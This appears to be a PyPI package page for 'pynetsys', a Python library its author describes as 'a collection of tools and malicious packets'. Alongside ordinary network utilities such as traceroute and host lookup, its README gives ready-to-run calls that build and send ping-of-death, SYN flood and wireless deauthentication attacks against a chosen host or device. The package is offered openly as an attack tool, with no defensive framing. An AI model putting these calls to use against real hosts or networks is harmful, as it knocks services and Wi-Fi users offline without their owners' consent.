pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
----------------
isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> str
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> str
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> str
print(removewebprotocol)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.1.4.tar.gz
(10.1 kB
view details)
Built Distribution
pynetsys-0.1.4-py3-none-any.whl
(10.2 kB
view details)
File details
Details for the file pynetsys-0.1.4.tar.gz
.
File metadata
- Download URL: pynetsys-0.1.4.tar.gz
- Upload date:
- Size: 10.1 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | e2df2dd78169f540c0febefd0b6276ee172fa481400314303d16c04a2af5b278 |
|
MD5 | 903173ba72d6c2451b37c00246092aff |
|
BLAKE2b-256 | 56f0eb916554a33b700c024b05218f0af3416d5038918cd5e22c6032a444217e |
File details
Details for the file pynetsys-0.1.4-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.1.4-py3-none-any.whl
- Upload date:
- Size: 10.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | a650b28663cb4687b8e2c816dfc693c11a46e6b35ec8df65774b38d99d5d9d7e |
|
MD5 | 0d41a76779c39d62e66bd3ababbe30fb |
|
BLAKE2b-256 | dfc6452a53b874a7fb9a585cdf094aa0c157dfee430f1dc0e8cdebd847a6e267 |